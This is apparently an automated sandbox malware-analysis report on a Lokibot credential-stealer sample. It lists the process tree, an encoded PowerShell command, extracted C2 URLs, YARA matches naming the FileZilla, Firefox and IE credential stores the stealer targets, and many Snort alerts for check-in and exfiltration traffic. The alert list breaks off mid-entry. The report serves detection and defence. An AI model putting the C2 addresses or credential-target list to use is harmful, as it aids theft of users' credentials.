Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Overview

General Information

Sample Name:	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Analysis ID:	756117
MD5:	3039fa7b347872c33c247581a27a7560
SHA1:	69832bbe446653f7d10eccf07069e73230138af8
SHA256:	f949fda96d4810c4ffa941ecce00160b984cf7ac32cf1ca88dd4dd9583f2e480
Tags:	exe
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Yara detected Lokibot

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Encrypted powershell cmdline option found

Machine Learning detection for sample

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe (PID: 5092 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe MD5: 3039FA7B347872C33C247581A27A7560)

powershell.exe (PID: 1508 cmdline: "powershell" Get-Date MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 2084 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

powershell.exe (PID: 1376 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RegAsm.exe (PID: 2084 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sedesadre.gq/PKZ/PWS/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x437f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17f10:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x52db:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13b1f:$des3: 68 03 66 00 00 0x17f10:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17fdc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2a768:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x1776f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x25fb3:$des3: 68 03 66 00 00 0x2a768:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x2a834:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000E.00000000.513382566.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17ef0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x52bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13aff:$des3: 68 03 66 00 00 0x17ef0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17fbc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x7fef4:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x15f577:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x177d0a:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: RegAsm.exe PID: 2084	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: RegAsm.exe PID: 2084	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: RegAsm.exe PID: 2084	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x21e2:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
14.0.RegAsm.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
14.0.RegAsm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.0.RegAsm.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
14.0.RegAsm.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
14.0.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
14.0.RegAsm.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
14.0.RegAsm.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
14.0.RegAsm.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
14.0.RegAsm.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 34 entries

Snort Signatures

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249731802021641 11/29/22-16:52:33.757391
SID:	2021641
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249720802025381 11/29/22-16:52:28.227779
SID:	2025381
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249717802025381 11/29/22-16:52:26.668343
SID:	2025381
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249726802025381 11/29/22-16:52:31.339365
SID:	2025381
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249725802024313 11/29/22-16:52:30.920170
SID:	2024313
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249725802024318 11/29/22-16:52:30.920170
SID:	2024318
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249716802024317 11/29/22-16:52:25.029133
SID:	2024317
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249722802021641 11/29/22-16:52:29.504056
SID:	2021641
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249716802024312 11/29/22-16:52:25.029133
SID:	2024312
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249718802825766 11/29/22-16:52:27.285136
SID:	2825766
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249719802021641 11/29/22-16:52:27.785438
SID:	2021641
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249727802825766 11/29/22-16:52:31.817491
SID:	2825766
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249721802825766 11/29/22-16:52:28.704063
SID:	2825766
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249730802825766 11/29/22-16:52:33.273429
SID:	2825766
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249728802021641 11/29/22-16:52:32.198993
SID:	2021641
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249730802025381 11/29/22-16:52:33.273429
SID:	2025381
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249721802021641 11/29/22-16:52:28.704063
SID:	2021641
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249727802021641 11/29/22-16:52:31.817491
SID:	2021641
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249717802825766 11/29/22-16:52:26.668343
SID:	2825766
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249732802021641 11/29/22-16:52:36.325135
SID:	2021641
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497182025483 11/29/22-16:52:27.393637
SID:	2025483
Source Port:	80
Destination Port:	49718
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249718802025381 11/29/22-16:52:27.285136
SID:	2025381
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249728802825766 11/29/22-16:52:32.198993
SID:	2825766
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497212025483 11/29/22-16:52:28.798694
SID:	2025483
Source Port:	80
Destination Port:	49721
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497202025483 11/29/22-16:52:28.346106
SID:	2025483
Source Port:	80
Destination Port:	49720
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249717802024312 11/29/22-16:52:26.668343
SID:	2024312
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249726802021641 11/29/22-16:52:31.339365
SID:	2021641
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249723802024318 11/29/22-16:52:30.023507
SID:	2024318
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249720802024318 11/29/22-16:52:28.227779
SID:	2024318
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497242025483 11/29/22-16:52:30.593492
